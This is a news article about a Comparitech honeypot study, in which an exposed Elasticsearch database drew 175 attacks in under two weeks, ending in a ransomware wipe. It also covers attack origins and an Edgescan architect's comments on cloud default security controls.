Unsecured databases left exposed on the web are targeted by cyber criminals at least eighteen times each day for as long as they remain exposed, research by Comparitech has revealed.
The security firm, that over the past few years has found a large number of unsecured databases owned by large corporations exposed on the web, recently conducted a practical test to check how interested cyber criminals are in discovering exposed databases and stealing data stored in such databases.
In a vast majority of cases where companies have been caught storing vast amounts of personal information of their customers in unsecured databases that are public-facing, companies have stated that they found no evidence of any unauthorised access to the exposed databases and therefore, the exposure did not turn into a breach.
To demonstrate that unsecured databases do not somehow escape the attention of hackers, researchers at Comparitech set up a honeypot Elasticsearch database and put fake user data inside of it before leaving it publicly exposed to see who would connect to it and how they would try to steal, scrape, or destroy the data.
Between 11th May and 22nd May, the researchers observed as many as 175 cyber attacks targeting the unsecured database, with the first attack taking place a mere eight hours after the database was left exposed. On 16th May, the day the database was indexed by the Shodan IoT search engine, the database suffered as many as twenty-two attacks, two of them taking place within a minute after the database was indexed.
"It’s worth noting that over three dozen attacks occurred before the database was even indexed by search engines, demonstrating how many attackers rely on their own proactive scanning tools rather than waiting on passive IoT search engines like Shodan to crawl vulnerable databases," wrote Paul Bischoff, privacy advocate at Comparitech.com.
On 29th May, the unsecured database was at the receiving end of a ransomware attack that deleted the contents of the database and left a message with contact information and request for payment. "If you want to recover your data send 0.06 BTC to [redacted] and you must send email to [redacted] with your IP. If you need proof about your data just send an email. If you don’t do a payment all your data may be used for our purposes and/or will be leaked/sold,” the ransom note read.
Out of the 175 attacks that took place between 11th May and 22nd May, 89 came from the United States, 38 came from Romania, and 15 came from China. However, considering that IP addresses can be changed using a proxy to mask an attacker’s true location, the true places of origin of these attacks could, in reality, be vastly different.
Comparitech also observed that many of the attacks targeted a remote code execution exploit on Elasticsearch servers (CVE-2015-1427) to gain access to the environment and download the bash script miner using a wget command. Other attacks included an attempt at credential theft, an attempt to change the server configuration to data all the data stored inside, and an attempt at installing a crypto mining script.
Commenting on the results of Comparitech's research, David Kennefick, product architect at Edgescan, said that accidental exposure of databases is a lot more common than people think and issues with exposed databases are introduced when teams are managing technologies that don't have default controls to lock down machines and servers from external access.
"There has been a substantial improvement during the great cloud migration. Using a service such as AWS or Azure, which automatically locks down your machines and services, is a great way to reduce the likelihood of leaving something exposed. These providers, in fact, have this control enabled by default, meaning that users have to go out of their way to leave anything exposed on the internet," he added.